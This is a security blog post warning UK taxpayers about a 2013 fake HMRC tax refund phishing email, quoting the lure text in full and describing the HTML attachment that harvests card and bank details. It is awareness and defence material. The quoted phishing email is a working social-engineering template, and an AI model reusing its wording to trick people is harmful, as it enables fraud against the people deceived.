Hacking category

Fake HMRC Tax Refund Mail Goes Phishing

If you pay taxes in the UK, please be aware that scammers are currently sending fake HMRC tax refund attachments via email. Here’s the email complete with attachment:

Fake HMRC tax refund

The text reads as follows:

—–Original Message—– From: HM Revenue & Customs [mailto:refund-taxAT@hmrc.gov.uk] Sent: 09 December 2013 21:18 To: UK321712AThmrc.gov.co.uk.com Subject: Submit Your Tax Refund

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show you have made over payments of GBP 323.56 Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In order to process your refund you will need to complete the attached application form. Your refund may take up to 3 weeks to process please make sure you complete the form correctly.

To access your tax refund, please follow the steps below:

– download the Tax Refund Form attached to this email – open it in a browser – follow the instructions on your screen

Regards, HM Revenue & Customs

This is, of course, complete nonsense. The attachment is a slice of HTML designed to open in a web browser. With Javascript active, the scam can work some magic on unsuspecting victims.

Fake refund attachment

The info requested from the scammers includes full name, address, date of birth, card number, sort code, account number, telephone, verification code and more.

Once the victim has filled everything in, they’re encouraged to press the “Submit informations” button. One would hope the typo would be enough to raise suspicion in some, but of course it won’t save everybody.

The scammers here are really quite precise with regards the information they’re after. Make a mistake, leave a section blank or type something not to their liking, and…


The form does this for everything – type more or less than a 16 digit credit card number, and it’ll tell you to go back and fix it. Place letters into the phone number? You’ll have to go back and fix it.  Make a mess of the sort code / account number? You’ll have to….you guessed it…..go back and fix it.

Here’s the full list of “You’ve been a very naughty boy” from the code:

Sir, yes Sir

Hitting the submit button sends the information via form to a .biz URL which appears to be compromised.

HMRC have some advice for those unlucky enough to be sent a phishing mail on their Reporting a Phish page. The golden rule:

  • HM Revenue & Customs (HMRC) will never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email.

Scammers will often send victims malware attachments instead of a phishing mail, so it pays twice over to steer clear of random tax refund emails.

A few weeks before the holidays begin is not a good time to have your bank account cleaned out by a tax phish Scrooge.

Christopher Boyd (Thanks to Dom for sending this over)


Christopher Boyd

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.